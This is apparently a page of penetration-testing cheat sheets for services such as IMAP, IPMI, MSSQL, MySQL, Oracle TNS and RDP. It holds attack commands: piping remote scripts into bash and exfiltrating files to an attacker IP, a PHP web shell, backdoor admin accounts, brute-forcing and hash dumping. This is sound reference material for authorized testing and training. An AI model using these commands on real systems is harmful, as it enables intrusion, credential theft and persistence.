gobuster_vhost.txt

3 min · d3vilsec

IMAP POP3

IMAP / POP3 Enumeration Cheatsheet Default Ports: IMAP: 143 (plain), 993 (SSL/TLS) POP3: 110 (plain), 995 (SSL/TLS) Banner Grabbing nc -nv <ip> 110 # POP3 nc -nv <ip> 143 # IMAP openssl s_client -connect <ip>:993 # IMAPS openssl s_client -connect <ip>:995 # POP3S openssl s_client -connect <ip>:143 -starttls imap # STARTTLS IMAP POP3 Commands (Manual) USER <username> PASS <password> STAT # Mailbox stats (message count, total size) LIST # List all messages with sizes LIST <n> # Info for message n RETR <n> # Retrieve (download) message n DELE <n> # Mark message n for deletion TOP <n> <lines> # Retrieve headers + first N lines of message n UIDL # Unique ID listing for all messages NOOP # Keep-alive RSET # Unmark any deletions QUIT # Commit deletes and disconnect IMAP Commands (Manual) a LOGIN <user> <pass> a CAPABILITY # Show server capabilities a LIST "" "*" # List all mailboxes a SELECT INBOX # Select inbox a STATUS INBOX (MESSAGES UNSEEN) # Inbox stats a FETCH 1:* (FLAGS) # List messages with flags a FETCH 1 (BODY[]) # Download full message 1 a FETCH 1 (BODY[HEADER]) # Headers only a FETCH 1 (BODY[TEXT]) # Body only a SEARCH ALL # Search all messages a SEARCH UNSEEN # Search unread messages a EXAMINE INBOX # Read-only select a LOGOUT Nmap Scripts nmap -p 110,143,993,995 --script imap-capabilities <ip> nmap -p 110,143,993,995 --script pop3-capabilities <ip> nmap -p 110 --script pop3-brute <ip> nmap -p 143 --script imap-brute <ip> nmap -p 993,995 --script imap-ntlm-info <ip> # Windows NTLM info leak Brute Force hydra -l <user> -P wordlist.txt imap://<ip> hydra -l <user> -P wordlist.txt pop3://<ip> hydra -l <user> -P wordlist.txt -s 993 -S imap://<ip> # IMAPS hydra -l <user> -P wordlist.txt -s 995 -S pop3://<ip> # POP3S curl Mail Access # List mailboxes curl -k 'imaps://<ip>' --user <user>:<pass> # List INBOX contents curl -k 'imaps://<ip>/INBOX' --user <user>:<pass> # Read specific message curl -k 'imaps://<ip>/INBOX;MAILINDEX=1' --user <user>:<pass> # POP3 via curl curl -k 'pop3s://<ip>' --user <user>:<pass> curl -k 'pop3s://<ip>/1' --user <user>:<pass> # Download message 1

2 min · d3vilsec

IPMI

IPMI Enumeration Cheatsheet Default Port: 623 (UDP) What is IPMI? Intelligent Platform Management Interface — out-of-band management for servers (iDRAC, iLO, BMC). Can give full remote control even if OS is down. Detection & Version nmap -sU -p 623 <ip> nmap -sU -p 623 --script ipmi-version <ip> Nmap Scripts nmap -sU -p 623 --script ipmi-version <ip> nmap -sU -p 623 --script ipmi-cipher-zero <ip> # Check for Cipher 0 auth bypass Metasploit Modules # Version detection use auxiliary/scanner/ipmi/ipmi_version set RHOSTS <ip> run # Dump RAKP hashes (no auth needed) use auxiliary/scanner/ipmi/ipmi_dumphashes set RHOSTS <ip> run # Cipher 0 auth bypass (unauthenticated admin access) use auxiliary/scanner/ipmi/ipmi_cipher_zero set RHOSTS <ip> run ipmitool (Direct Interaction) # Version/status ipmitool -I lanplus -H <ip> -U admin -P admin chassis status # List users ipmitool -I lanplus -H <ip> -U admin -P admin user list # LAN config ipmitool -I lanplus -H <ip> -U admin -P admin lan print # Power control ipmitool -I lanplus -H <ip> -U admin -P admin power status ipmitool -I lanplus -H <ip> -U admin -P admin power reset # Add user (post-compromise) ipmitool -I lanplus -H <ip> -U admin -P admin user set name 4 hacker ipmitool -I lanplus -H <ip> -U admin -P admin user set password 4 Password1 ipmitool -I lanplus -H <ip> -U admin -P admin user priv 4 4 # Admin priv ipmitool -I lanplus -H <ip> -U admin -P admin user enable 4 Hash Cracking (After RAKP Dump) # Hashcat mode 7300 = IPMI2 RAKP HMAC-SHA1 hashcat -m 7300 hashes.txt wordlist.txt hashcat -m 7300 hashes.txt wordlist.txt -r rules/best64.rule Default Credentials Vendor / Interface Username Default Password Dell iDRAC root calvin HP iLO Administrator (printed on pull tab) Supermicro IPMI ADMIN ADMIN IBM IMM USERID PASSW0RD Cisco CIMC admin password Intel RMM admin (blank) Key Vulnerabilities Issue Description Cipher 0 Allows unauthenticated auth bypass — attacker can set any password RAKP hash dump IPMI spec allows anyone to request auth hash → offline crack Default creds Most systems ship with known default credentials Anonymous auth Some BMCs allow completely anonymous access

2 min · d3vilsec

Linux File Transfers

Linux File Transfer Cheatsheet Default Ports: HTTP 80/tcp · SSH/SCP 22/tcp · FTP 21/tcp · SMB 445/tcp · TFTP 69/udp “Download” = pulling a file onto the Linux target. “Upload” = exfiltrating off it. For authorized testing, CTFs, and lab use only. wget / curl — Download wget http://10.10.14.5/file -O /tmp/file wget -q http://10.10.14.5/file -O /tmp/file # quiet curl http://10.10.14.5/file -o /tmp/file curl -s http://10.10.14.5/file -o /tmp/file # silent # Ignore TLS cert errors wget --no-check-certificate https://10.10.14.5/file -O /tmp/file curl -k https://10.10.14.5/file -o /tmp/file # Fileless — pipe straight into a shell (verify before doing this) curl -s http://10.10.14.5/s.sh | bash wget -qO- http://10.10.14.5/s.sh | bash wget / curl — Upload (Exfil) # POST a file to an upload-capable listener curl -X POST -F 'file=@/tmp/loot.tar' http://10.10.14.5/upload curl -T /tmp/loot.tar http://10.10.14.5/loot.tar # PUT wget --post-file=/tmp/loot.tar http://10.10.14.5/upload Attacker-side upload server: ...

3 min · d3vilsec

Metasploit Framework

Metasploit Framework Cheatsheet Default Ports: N/A (framework) — handlers commonly bind 4444/tcp For authorized testing, CTFs, and lab use only. Always have explicit permission. Starting Up msfconsole # Launch the console msfconsole -q # Launch quietly (no banner) msfconsole -r script.rc # Run a resource script on start msfdb init # Initialise the PostgreSQL database msfdb status # Check database status service postgresql start # Start DB backend (if not running) Inside the console: db_status # Confirm DB connection version # Show framework version help # List commands banner # Print a random banner Core Console Commands Command Description search <term> Search modules use <module> Select a module info Show details of current module show options Show required/optional settings show advanced Show advanced options show payloads List compatible payloads show targets List target platforms set <opt> <val> Set an option setg <opt> <val> Set an option globally (all modules) unset <opt> Clear an option (unset all for all) run / exploit Execute the module back Leave the current module info -d Open module docs in browser Searching Modules search type:exploit platform:windows smb search cve:2017-0144 # EternalBlue search name:eternalblue search type:auxiliary scanner ssh search rank:excellent type:exploit struts Search filters: type: platform: cve: name: rank: author: app: port: ...

5 min · d3vilsec

MSSQL

MSSQL Enumeration Cheatsheet Default Ports: 1433 (TCP), 1434 (UDP — SQL Server Browser) Discovery & Nmap Scripts nmap -p 1433 --script ms-sql-info <ip> nmap -p 1433 --script ms-sql-config <ip> nmap -p 1433 --script ms-sql-empty-password <ip> nmap -p 1433 --script ms-sql-brute <ip> nmap -sU -p 1434 --script ms-sql-dac <ip> # Discover dynamic ports via UDP nmap -p 1433 --script ms-sql-* <ip> # All MSSQL scripts Metasploit Modules use auxiliary/scanner/mssql/mssql_ping # Discovery + version use auxiliary/scanner/mssql/mssql_login # Brute force auth use auxiliary/admin/mssql/mssql_sql # Execute SQL query use auxiliary/admin/mssql/mssql_exec # OS command execution (xp_cmdshell) use auxiliary/admin/mssql/mssql_enum # Full enumeration use auxiliary/admin/mssql/mssql_enum_sql_logins # Enumerate SQL logins mssqlclient.py (impacket) # Connect with SQL auth python3 mssqlclient.py <user>:<pass>@<ip> # Connect with Windows auth python3 mssqlclient.py <domain>/<user>:<pass>@<ip> -windows-auth # Connect with hash (Pass-the-Hash) python3 mssqlclient.py <domain>/<user>@<ip> -hashes :<nthash> -windows-auth Useful SQL Queries -- Version and user info SELECT @@version; SELECT system_user; SELECT user_name(); SELECT DB_NAME(); -- Check if sysadmin SELECT IS_SRVROLEMEMBER('sysadmin'); SELECT IS_MEMBER('db_owner'); -- List databases SELECT name FROM sys.databases; USE <database>; SELECT table_name FROM information_schema.tables; -- List users and roles SELECT name, type_desc FROM sys.server_principals; SELECT name FROM sys.syslogins; SELECT roles.name FROM sys.server_role_members JOIN sys.server_principals AS roles ON roles.principal_id = server_role_members.role_principal_id JOIN sys.server_principals AS members ON members.principal_id = server_role_members.member_principal_id WHERE members.name = '<user>'; xp_cmdshell (OS Command Execution) -- Enable xp_cmdshell (requires sysadmin) EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; -- Run commands EXEC xp_cmdshell 'whoami'; EXEC xp_cmdshell 'net user'; EXEC xp_cmdshell 'powershell -enc <base64payload>'; Linked Servers (Lateral Movement) -- Enumerate linked servers SELECT * FROM sys.servers; EXEC sp_linkedservers; -- Execute query on linked server EXECUTE('SELECT @@version') AT [<linked_server>]; EXECUTE('SELECT system_user') AT [<linked_server>]; -- Execute OS command via linked server EXECUTE('EXEC xp_cmdshell ''whoami''') AT [<linked_server>]; Brute Force hydra -l sa -P wordlist.txt mssql://<ip> medusa -h <ip> -u sa -P wordlist.txt -M mssql crackmapexec mssql <ip> -u <user> -p wordlist.txt File Read / Write -- Read file (via BULK INSERT or OPENROWSET) SELECT * FROM OPENROWSET(BULK 'C:\Windows\win.ini', SINGLE_CLOB) AS t; -- Write file (via xp_cmdshell) EXEC xp_cmdshell 'echo hacked > C:\inetpub\wwwroot\shell.txt';

2 min · d3vilsec

MySQL

MySQL Enumeration Cheatsheet Default Port: 3306 (TCP) Connection & Banner Grabbing nc -nv <ip> 3306 # Banner grab mysql -u root -h <ip> # No password mysql -u root -p -h <ip> # Prompt for password mysql -u root -p<password> -h <ip> # Inline password (no space) mysql -u root -h <ip> -e "SELECT version();" # One-liner query Nmap Scripts nmap -p 3306 --script mysql-info <ip> nmap -p 3306 --script mysql-databases \ --script-args mysqluser=root,mysqlpass='' <ip> nmap -p 3306 --script mysql-empty-password <ip> nmap -p 3306 --script mysql-brute <ip> nmap -p 3306 --script mysql-audit <ip> nmap -p 3306 --script mysql-vuln-cve2012-2122 <ip> nmap -p 3306 --script mysql-* <ip> # All MySQL scripts Enumeration Queries -- Version and environment SELECT version(); SELECT @@version; SELECT user(); SELECT @@datadir; SELECT @@basedir; SELECT @@hostname; -- Databases and tables SHOW databases; USE <database>; SHOW tables; DESCRIBE <table>; SELECT * FROM <table> LIMIT 5; SELECT table_schema, table_name FROM information_schema.tables; -- Users and privileges SELECT user, host, authentication_string FROM mysql.user; SELECT user, host, password FROM mysql.user; -- older MySQL SELECT * FROM information_schema.user_privileges; SHOW GRANTS FOR '<user>'@'<host>'; SHOW GRANTS FOR CURRENT_USER(); -- Check FILE privilege SELECT user, host, File_priv FROM mysql.user; File Read / Write (Requires FILE Privilege) -- Read files SELECT LOAD_FILE('/etc/passwd'); SELECT LOAD_FILE('/etc/shadow'); SELECT LOAD_FILE('C:/Windows/System32/drivers/etc/hosts'); -- Write files (web shell) SELECT '<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/html/shell.php'; -- Write SSH key SELECT 'ssh-rsa AAAA...' INTO OUTFILE '/root/.ssh/authorized_keys'; Brute Force hydra -l root -P wordlist.txt mysql://<ip> hydra -L users.txt -P wordlist.txt mysql://<ip> medusa -h <ip> -u root -P wordlist.txt -M mysql User-Defined Functions (UDF) for Privilege Escalation -- Check if plugin dir is writable (post-login) SHOW variables LIKE 'plugin_dir'; -- Drop malicious UDF .so/.dll into plugin dir, -- then create the function and execute OS commands CREATE FUNCTION sys_exec RETURNS INT SONAME 'lib_mysqludf_sys.so'; SELECT sys_exec('id > /tmp/out'); Common Credentials to Try root : (blank) root : root root : password root : mysql root : toor admin : admin

2 min · d3vilsec

netcraft

Netcraft Cheatsheet Purpose: Passive reconnaissance — hosting history, OS / web server history, SSL certificate history, site report, and subdomain discovery for a target domain. Uses Netcraft’s long-running internet survey, so no traffic touches the target. Format: Web service. Free site-report lookups; subdomain search; commercial APIs for bulk. Access Points Surface URL Site Report (single site) https://sitereport.netcraft.com/?url= Subdomain / Domain search https://searchdns.netcraft.com/ What’s that site running? (legacy) https://toolbar.netcraft.com/site_report?url= Phishing / takedown reporting https://report.netcraft.com/ Anti-phishing browser extension https://www.netcraft.com/apps/ Quick Lookups (URL-style) # Site Report xdg-open "https://sitereport.netcraft.com/?url=https://target.tld" # Subdomain search (DNS knowledge, not zone transfer) xdg-open "https://searchdns.netcraft.com/?host=*.target.tld" # Scrape subdomain list (HTML — fragile, format may change) curl -s -A "Mozilla/5.0" \ "https://searchdns.netcraft.com/?restriction=site+ends+with&host=target.tld" \ | grep -oE '[a-zA-Z0-9.-]+\.target\.tld' | sort -u What the Site Report Reveals Background: site title, description, language, first-seen date Network: IPv4/IPv6, ASN, netblock owner, hosting country, nameservers, reverse DNS Hosting history: OS, web server, hosting provider, IP changes over time (often years) SSL/TLS: certificate issuer, valid-from / valid-to, signature alg, key size, full chain Web trackers: analytics, ad networks, tag managers Site technologies: server-side language, CMS, JS frameworks (similar surface to Wappalyzer/WhatWeb but historical) Risk rating: Netcraft’s own risk scoring (popularity, reputation, phishing flags) OSINT Pivots Hosting history → identify legacy IPs that may still serve content (origin behind CDN, forgotten staging). SSL history → past CN / SAN entries leak retired subdomains and internal hostnames. Same nameservers + hosting across multiple sites → infrastructure attribution. First-seen date → useful for triaging suspicious / typosquat domains. Subdomain Discovery https://searchdns.netcraft.com/?host=*.target.tld Returns publicly known hosts under a domain. Complement, do not replace, [[crt.sh]] / amass / subfinder — Netcraft sees long-tail hosts those miss, and vice versa. Free tier paginates and rate-limits aggressively; expect a CAPTCHA on bulk. Workflow Example DOMAIN=target.tld # 1. Open Site Report xdg-open "https://sitereport.netcraft.com/?url=https://$DOMAIN" # 2. Pull subdomain list (best-effort scrape) curl -s -A "Mozilla/5.0" \ "https://searchdns.netcraft.com/?restriction=site+ends+with&host=$DOMAIN" \ | grep -oE "[a-zA-Z0-9.-]+\.$DOMAIN" | sort -u > netcraft-subs.txt # 3. Cross-check with crt.sh curl -s "https://crt.sh/?q=%25.$DOMAIN&output=json" \ | jq -r '.[].name_value' | tr ',' ' ' | sort -u > crtsh-subs.txt # 4. Merge sort -u netcraft-subs.txt crtsh-subs.txt > all-subs.txt Browser Extension Netcraft’s anti-phishing extension shows live Site Report data inline: ...

3 min · d3vilsec

nikto

Nikto Cheatsheet Purpose: Web server scanner — checks for dangerous files, outdated server software, misconfigurations, and known vulnerabilities. Basic Usage nikto -h <target> # Scan a target (default port 80) nikto -h https://target.tld # HTTPS target nikto -h <ip> -p 443 -ssl # Force SSL on custom port nikto -h <ip> -p 80,443,8080,8443 # Multiple ports nikto -h hosts.txt # Scan a list of targets Common Flags Flag Description -h <host> Target host, URL, or file of hosts -p <ports> Port(s) — single, list, or range -ssl Force SSL/TLS -nossl Disable SSL -root <path> Prepend root path to all requests -vhost <host> Set virtual host (Host header) -id <user:pass> HTTP Basic auth -useragent <ua> Custom User-Agent -useproxy <url> Route through proxy -Display <opts> Output verbosity flags (see below) -Format <fmt> Output format: csv, htm, txt, xml, json, sql -output <file> Write report to file -Tuning <ids> Limit checks to specific categories -Plugins <list> Run specific plugins only -evasion <ids> IDS evasion techniques -timeout <s> Per-request timeout -maxtime <s/m/h> Hard scan time limit (e.g. 30m) -Pause <s> Pause between requests -ask no Don’t prompt to submit findings -update Update plugins / databases -list-plugins List installed plugins Output nikto -h https://target.tld -o report.html -Format htm nikto -h <ip> -o nikto.json -Format json nikto -h <ip> -o nikto.xml -Format xml nikto -h <ip> -o nikto.csv -Format csv -Display flags (combine, e.g. -Display 1V): ...

3 min · d3vilsec

Nmap

Nmap Cheatsheet Default Ports: N/A (scanner tool) Scan Types Flag Description -sS SYN scan (stealth, default with root) -sT TCP connect scan (no root needed) -sU UDP scan -sV Service/version detection -sC Default scripts -sA ACK scan (firewall mapping) -sN NULL scan -sF FIN scan -sX Xmas scan -sn Ping sweep (no port scan) -O OS detection -A Aggressive (OS + version + scripts + traceroute) Port Specification nmap -p 22 # Single port nmap -p 22,80,443 # Multiple ports nmap -p 1-1024 # Port range nmap -p- # All 65535 ports nmap --top-ports 1000 # Top 1000 ports nmap -F # Fast scan (top 100) Timing Templates Flag Name Description -T0 Paranoid IDS evasion, very slow -T1 Sneaky Slow, IDS evasion -T2 Polite Slower, less bandwidth -T3 Normal Default -T4 Aggressive Faster, reliable network -T5 Insane Very fast, may miss results Output Formats nmap -oN output.txt # Normal output nmap -oX output.xml # XML output nmap -oG output.gnmap # Grepable output nmap -oA output # All formats at once Host Discovery nmap -sn 192.168.1.0/24 # Ping sweep nmap -PS22,80,443 192.168.1.0/24 # TCP SYN ping nmap -PA80 192.168.1.0/24 # TCP ACK ping nmap -PU53 192.168.1.0/24 # UDP ping nmap -PE 192.168.1.0/24 # ICMP echo ping nmap --disable-arp-ping 192.168.1.1 # Skip ARP discovery Evasion & Spoofing nmap -D RND:5 <target> # Decoy scan (5 random decoys) nmap -D decoy1,decoy2 <target> # Named decoys nmap -S <spoof-ip> <target> # Spoof source IP nmap --spoof-mac 0 <target> # Random MAC spoof nmap -f <target> # Fragment packets nmap --mtu 24 <target> # Custom MTU (must be multiple of 8) nmap --data-length 25 <target> # Append random data to packets nmap --scan-delay 5s <target> # Delay between probes nmap -sI <zombie> <target> # Idle/zombie scan nmap --proxies socks4://host:port # Route through proxy NSE Scripts nmap --script=<name> <target> # Run specific script nmap --script=<category> <target> # Run entire category nmap --script-help=<name> # Get help for a script nmap --script-updatedb # Update script database # Script categories: # auth, broadcast, brute, default, discovery, # dos, exploit, external, fuzzer, intrusive, # malware, safe, version, vuln Common Scan Combos # Quick full port scan nmap -p- --min-rate 5000 -T4 <target> # Detailed enum after port discovery nmap -p <ports> -sV -sC -O <target> # Aggressive all-in-one nmap -A -p- <target> # Stealth SYN + version detection nmap -sS -sV -p- -T4 <target> # UDP top ports nmap -sU --top-ports 100 <target> # Vulnerability scan nmap --script vuln <target> # Banner grabbing nmap -sV --script banner <target>

2 min · d3vilsec

Oracle TNS

Oracle TNS Enumeration Cheatsheet Default Port: 1521 (TCP) Nmap Scripts nmap -p 1521 --script oracle-tns-version <ip> nmap -p 1521 --script oracle-sid-brute <ip> nmap -p 1521 --script oracle-brute <ip> nmap -p 1521 --script oracle-brute-stealth <ip> nmap -p 1521 --script oracle-enum-users \ --script-args oracle-enum-users.sid=<sid> <ip> ODAT (Oracle Database Attacking Tool) # Full automated scan odat all -s <ip> -p 1521 # SID brute force odat sidguesser -s <ip> -p 1521 # Password brute force (after getting SID) odat passwordguesser -s <ip> -p 1521 -d <sid> # File read/write (requires UTL_FILE privilege) odat utlfile -s <ip> -d <sid> -U <user> -P <pass> --getFile /etc/passwd /tmp/passwd.txt odat utlfile -s <ip> -d <sid> -U <user> -P <pass> --putFile /tmp shell.php shell.php # OS command execution (requires Java) odat java -s <ip> -d <sid> -U <user> -P <pass> --exec "whoami" # External table method for file read odat externaltable -s <ip> -d <sid> -U <user> -P <pass> --getFile /etc/passwd sqlplus (Direct Connection) # Install: sudo apt install oracle-instantclient-sqlplus # Connect sqlplus <user>/<pass>@<ip>:<port>/<sid> sqlplus <user>/<pass>@<ip>:<port>/<sid> as sysdba sqlplus <user>/<pass>@//<ip>:<port>/<service_name> Common SIDs to Try XE ORCL DB DATABASE PROD TEST DEV ORACLE OEMREP ORACLR_CONNECTION_DATA Enumeration Queries (Once Connected) -- Version and user SELECT * FROM v$version; SELECT user FROM dual; SELECT * FROM session_privs; -- Database objects SELECT * FROM all_tables; SELECT owner, table_name FROM all_tables WHERE owner != 'SYS'; SELECT column_name, data_type FROM all_tab_columns WHERE table_name = '<TABLE>'; -- Users and privileges SELECT username FROM dba_users; SELECT * FROM user_role_privs; SELECT * FROM dba_sys_privs WHERE grantee = '<user>'; -- Password hashes (as SYSDBA) SELECT name, password FROM sys.user$; SELECT name, spare4 FROM sys.user$; -- SHA-1 hashes (11g+) -- Check for DBA role SELECT * FROM session_privs WHERE privilege = 'CREATE SESSION'; Privilege Escalation via Java -- Grant Java permissions (as DBA) EXEC dbms_java.grant_permission('SCOTT', 'SYS:java.io.FilePermission', '<<ALL FILES>>', 'execute'); EXEC dbms_java.grant_permission('SCOTT', 'SYS:java.lang.RuntimePermission', 'writeFileDescriptor', ''); EXEC dbms_java.grant_permission('SCOTT', 'SYS:java.lang.RuntimePermission', 'readFileDescriptor', ''); -- Execute OS command via Java SELECT dbms_java.runjava('oracle/aurora/util/Wrapper /bin/bash -c "id > /tmp/out"') FROM dual; Brute Force hydra -l <user> -P wordlist.txt -s 1521 oracle://<ip>/<sid> nmap -p 1521 --script oracle-brute \ --script-args oracle-brute.sid=<sid> <ip> Default Credentials Username Password Notes sys change_on_install sysdba system manager scott tiger Classic demo user dbsnmp dbsnmp SNMP agent mdsys mdsys hr hr

2 min · d3vilsec

puredns

puredns Cheatsheet Type: Powerful DNS brute-forcing and resolution tool — filters wildcard results effectively at scale Installation go install github.com/d3mondev/puredns/v2@latest # Binary ends up in ~/go/bin/puredns # Also requires massdns (dependency for fast resolution) git clone https://github.com/blechschmidt/massdns.git cd massdns && make sudo cp bin/massdns /usr/local/bin/ Modes Mode Description bruteforce Brute force subdomains using a wordlist resolve Resolve a list of domains/subdomains Basic Usage # Brute force puredns bruteforce wordlist.txt example.com # Resolve a list of subdomains puredns resolve subdomains.txt Common Flags Flag Description -r <file> Resolver list file (required for speed) --resolvers-trusted <file> Trusted resolvers for wildcard detection -l <n> Rate limit (queries per second) --bin <path> Path to massdns binary -w <file> Write valid results to file --wildcard-tests <n> Number of wildcard tests per domain (default: 10) --wildcard-batch <n> Subdomains to test per batch --skip-wildcard-filter Skip wildcard filtering --skip-validation Skip validation step -t <n> Massdns threads -q Quiet mode -v Verbose Common Commands # Basic brute force with resolver list puredns bruteforce wordlist.txt example.com -r resolvers.txt # Brute force with rate limiting puredns bruteforce wordlist.txt example.com \ -r resolvers.txt \ -l 1000 # Brute force with trusted resolvers for wildcard detection puredns bruteforce wordlist.txt example.com \ -r resolvers.txt \ --resolvers-trusted trusted.txt # Save results to file puredns bruteforce wordlist.txt example.com \ -r resolvers.txt \ -w results.txt # Resolve a list of subdomains puredns resolve subdomains.txt -r resolvers.txt # Resolve and save valid results puredns resolve subdomains.txt -r resolvers.txt -w resolved.txt # Skip wildcard filter (if you want all results) puredns bruteforce wordlist.txt example.com \ -r resolvers.txt \ --skip-wildcard-filter # Quiet output (subdomains only to stdout) puredns bruteforce wordlist.txt example.com -r resolvers.txt -q Resolver Lists Public resolver lists are essential for speed and accuracy: ...

3 min · d3vilsec

R Services

R-Services Enumeration Cheatsheet Default Ports: rexec: 512 (TCP) rlogin: 513 (TCP) rsh / rcp: 514 (TCP) rpcbind / portmapper: 111 (TCP/UDP) Note: R-services transmit data in cleartext and rely on IP-based trust. They are largely obsolete but still found in legacy Unix/Linux environments. Detection nmap -p 512-514 <ip> nmap -p 512-514 -sV <ip> nmap -p 111 <ip> rlogin # Login as current user rlogin <ip> # Login as specific user rlogin -l <user> <ip> rsh (Remote Shell) # Execute command remotely rsh <ip> <command> rsh -l <user> <ip> whoami rsh -l <user> <ip> cat /etc/passwd rsh -l <user> <ip> /bin/bash rexec (Remote Exec) rexec <ip> -l <user> <command> rexec <ip> -l <user> id rpcbind / Portmapper (Port 111) # List all registered RPC services rpcinfo -p <ip> # List NFS mounts (if NFS is running) showmount -e <ip> # Nmap nmap -p 111 --script rpcinfo <ip> nmap -p 111 --script nfs-ls <ip> nmap -p 111 --script nfs-showmount <ip> nmap -p 111 --script nfs-statfs <ip> rwho / ruptime # List logged-in users across trusted hosts rwho # Show uptime across trusted hosts ruptime Trust Files (Critical Targets) These files define which hosts/users can connect without a password: ...

2 min · d3vilsec

RDP

RDP Enumeration Cheatsheet Default Port: 3389 (TCP) Detection & Info Gathering nmap -p 3389 -sV <ip> nmap -p 3389 --script rdp-enum-encryption <ip> nmap -p 3389 --script rdp-vuln-ms12-020 <ip> nmap -p 3389 --script rdp-enum-encryption,rdp-vuln-ms12-020,rdp-ntlm-info <ip> Check NLA (Network Level Auth) # If NLA is required, credential prompt appears BEFORE full connection nmap -p 3389 --script rdp-enum-encryption <ip> # Look for: "Security layer: NLA" or "CredSSP" # rdp_check.py (impacket) — tests credential validity python3 rdp_check.py <domain>/<user>:<pass>@<ip> Password Attacks # Hydra hydra -l <user> -P wordlist.txt rdp://<ip> hydra -L users.txt -P wordlist.txt rdp://<ip> hydra -l <user> -P wordlist.txt rdp://<ip> -t 4 # Limit threads (RDP is picky) # Crowbar crowbar -b rdp -s <ip>/32 -u <user> -C wordlist.txt crowbar -b rdp -s 192.168.1.0/24 -U users.txt -C wordlist.txt # Metasploit use auxiliary/scanner/rdp/rdp_scanner set RHOSTS <ip> run Connecting via Linux # xfreerdp (recommended) xfreerdp /u:<user> /p:<pass> /v:<ip> xfreerdp /u:<user> /p:<pass> /v:<ip> /d:<domain> xfreerdp /u:<user> /p:<pass> /v:<ip> /drive:share,/tmp # Mount local dir xfreerdp /u:<user> /p:<pass> /v:<ip> /cert-ignore # Ignore cert errors xfreerdp /u:<user> /h:<nthash> /v:<ip> # Pass-the-Hash # rdesktop rdesktop <ip> rdesktop -u <user> -p <pass> -d <domain> <ip> # Remmina (GUI) remmina -c rdp://<user>@<ip> Session Hijacking (Post-Exploitation) # List sessions (on Windows target) query session query user # Hijack disconnected session (as SYSTEM) tscon <session_id> /dest:<current_session> Key Vulnerabilities CVE Name Affected Systems Description CVE-2019-0708 BlueKeep Win7, WinXP, Server 2008 Pre-auth RCE via RDP CVE-2019-1181 DejaBlue Win8, Win10, Server 2012+ Pre-auth RCE via RDP CVE-2019-1182 DejaBlue Win8, Win10, Server 2012+ Pre-auth RCE via RDP CVE-2012-0002 MS12-020 Multiple DoS / potential code execution BlueKeep Check (Metasploit) use auxiliary/scanner/rdp/cve_2019_0708_bluekeep set RHOSTS <ip> run Useful Options # Custom RDP port xfreerdp /u:<user> /p:<pass> /v:<ip>:<port> # Enable clipboard sharing xfreerdp /u:<user> /p:<pass> /v:<ip> +clipboard # Full screen xfreerdp /u:<user> /p:<pass> /v:<ip> /f # Dynamic resolution xfreerdp /u:<user> /p:<pass> /v:<ip> /dynamic-resolution

2 min · d3vilsec